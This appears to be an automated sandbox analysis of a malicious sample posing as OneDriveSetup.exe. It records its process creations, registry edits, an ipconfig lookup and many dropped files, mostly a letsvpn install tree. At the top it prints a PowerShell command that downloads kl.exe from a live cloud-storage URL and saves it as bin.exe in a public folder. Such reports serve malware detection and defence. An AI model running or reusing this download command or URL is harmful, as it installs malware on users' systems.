                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://aa-1348336590.cos.ap-hongkong.myqcloud.com/kl.exe', 'C:\Users\Public\Videos\bin.exe')"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://aa-1348336590.cos.ap-hongkong.myqcloud.com/kl.exe', 'C:\Users\Public\Videos\bin.exe')"Jump to behavior
                Uses cmd line tools excessively to alter registry or file data
                Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                Source: C:\Users\user\Desktop\OneDriveSetup.exeProcess created: reg.exe
                Source: C:\Users\user\Desktop\OneDriveSetup.exeProcess created: reg.exeJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
                Uses ipconfig to lookup or modify the Windows network settings
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /all
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\zh-SG\LetsPRO.resources.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Globalization.Calendars.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Linq.Parallel.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Security.Cryptography.Pkcs.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Runtime.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Security.Claims.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Web.Services.Description.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Runtime.Serialization.Primitives.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Net.WebHeaderCollection.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\Microsoft.Expression.Interactions.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Security.Cryptography.X509Certificates.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Net.Http.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Diagnostics.TextWriterTraceListener.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.ComponentModel.EventBasedAsync.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Windows.Interactivity.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\Microsoft.Web.WebView2.WinForms.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\Mono.Cecil.Rocks.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Collections.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.IO.Packaging.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.IO.FileSystem.Primitives.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\Mono.Cecil.Mdb.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.ServiceProcess.ServiceController.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.ComponentModel.Primitives.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\LetsPRO.exeJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\cs\System.Web.Services.Description.resources.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\SuperSocket.ClientEngine.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Collections.Concurrent.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Net.IPNetwork.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Net.Security.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.ServiceModel.Security.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\PusherClient.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\SQLiteNetExtensionsAsync.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\WpfAnimatedGif.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Net.Requests.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.ValueTuple.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\es\System.Web.Services.Description.resources.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Threading.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.ServiceModel.NetTcp.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.IO.IsolatedStorage.dllJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Videos\bin.exeJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Net.NameResolution.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\libwin.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Text.Encoding.Extensions.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.IO.FileSystem.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\log4net.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Resources.Writer.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Drawing.Primitives.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Resources.Reader.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Buffers.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Diagnostics.Tools.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\ko\System.Web.Services.Description.resources.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Runtime.Numerics.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Xml.XmlSerializer.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Threading.Tasks.Extensions.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\fr\System.Web.Services.Description.resources.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\zh-TW\LetsPRO.resources.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\zh-CN\LetsPRO.resources.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\SQLitePCLRaw.batteries_v2.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Linq.Queryable.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Runtime.InteropServices.RuntimeInformation.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.IO.FileSystem.DriveInfo.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\Microsoft.Toolkit.Uwp.Notifications.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.ServiceModel.Duplex.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Xml.XPath.XDocument.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Threading.Tasks.Parallel.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\zh-Hant\System.Web.Services.Description.resources.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.IO.Compression.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Net.Sockets.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\ru\LetsPRO.resources.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Threading.Timer.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Runtime.Extensions.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Dynamic.Runtime.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.IO.Compression.ZipFile.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\SQLiteNetExtensions.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.IO.Ports.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Security.Permissions.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
                Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\DriverStore\Temp\{e1a4fd9a-c078-804d-adb0-e99915b985de}\SETEB17.tmpJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Text.Encoding.CodePages.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\Microsoft.AppCenter.Crashes.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\pt-BR\System.Web.Services.Description.resources.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.ServiceModel.Primitives.dllJump to dropped file
                Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\drivers\SETF101.tmpJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Security.Cryptography.Encoding.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Security.Cryptography.Csp.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\x64\WebView2Loader.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Numerics.Vectors.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\pl\System.Web.Services.Description.resources.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Security.SecureString.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Xml.XmlDocument.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Diagnostics.PerformanceCounter.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\zh-MO\LetsPRO.resources.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\Microsoft.AppCenter.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\microsoft.identitymodel.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\CommunityToolkit.Mvvm.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\Utils.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\Microsoft.Win32.Registry.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.ComponentModel.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\Hardcodet.Wpf.TaskbarNotification.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsVPNDomainModel.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Diagnostics.EventLog.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\arm64\WebView2Loader.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.IO.Pipes.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\Microsoft.Web.WebView2.Wpf.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Security.AccessControl.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\zh-Hans\System.Web.Services.Description.resources.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\DeltaCompressionDotNet.PatchApi.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\SQLitePCLRaw.nativelibrary.dllJump to dropped file
                Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\drivers\tap0901.sys (copy)Jump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\it\System.Web.Services.Description.resources.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Diagnostics.Debug.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.IO.Pipes.AccessControl.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsGoogleAnalytics.exeJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Diagnostics.StackTrace.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Text.RegularExpressions.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.CodeDom.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Security.Cryptography.Cng.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Diagnostics.Tracing.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\Microsoft.Win32.SystemEvents.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\ndp462-web.exeJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Xml.XDocument.dllJump to dropped file
                Source: C:\Users\user\Desktop\OneDriveSetup.exeFile created: C:\Users\Public\Music\20250413054815\Agghosts.exeJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Security.Cryptography.Algorithms.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Threading.Thread.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\Mono.Cecil.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Net.WebSockets.Client.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\FontAwesome.WPF.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Data.OleDb.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\SVGImage.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.ServiceModel.Http.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\runtimes\win-x64\native\e_sqlite3.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\Microsoft.Win32.Registry.AccessControl.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Diagnostics.FileVersionInfo.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.IO.FileSystem.Watcher.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Users\user\AppData\Local\Temp\nsj49F4.tmp\System.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\Update.exeJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\Mono.Cecil.Pdb.dllJump to dropped file
                Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\DriverStore\Temp\{e1a4fd9a-c078-804d-adb0-e99915b985de}\tap0901.sys (copy)Jump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Globalization.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\zh-HK\LetsPRO.resources.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.IO.FileSystem.AccessControl.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\de\System.Web.Services.Description.resources.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Diagnostics.TraceSource.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Drawing.Common.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Runtime.Serialization.Xml.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\ToastNotifications.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Xml.XPath.dllJump to dropped file
                Source: C:\Users\user\Desktop\OneDriveSetup.exeFile created: C:\Users\Public\Music\20250413054815\libcef.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\SQLitePCLRaw.core.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Linq.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Console.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\ru\System.Web.Services.Description.resources.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Threading.Overlapped.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Diagnostics.Contracts.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Net.Primitives.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Configuration.ConfigurationManager.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\ICSharpCode.AvalonEdit.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Runtime.CompilerServices.VisualC.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\uninst.exeJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\runtimes\win-x86\native\e_sqlite3.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Reflection.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.ComponentModel.TypeConverter.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Threading.Tasks.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\Microsoft.Win32.Primitives.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\x86\WebView2Loader.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\DeltaCompressionDotNet.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Runtime.Handles.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Data.SqlClient.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsGoogleAnalytics.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.ObjectModel.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\Microsoft.Bcl.AsyncInterfaces.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Net.Ping.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\netstandard.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\DeltaCompressionDotNet.MsDelta.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.IO.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\SQLitePCLRaw.provider.dynamic_cdecl.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Data.Odbc.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Threading.ThreadPool.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Security.Principal.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Diagnostics.Process.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\runtimes\win-arm\native\e_sqlite3.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\NuGet.Squirrel.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Data.Common.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Runtime.InteropServices.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\SharpCompress.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Security.Principal.Windows.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.ServiceModel.Syndication.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\Microsoft.AppCenter.Analytics.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\Squirrel.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.ComponentModel.Annotations.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\ja\System.Web.Services.Description.resources.dllJump to dropped file
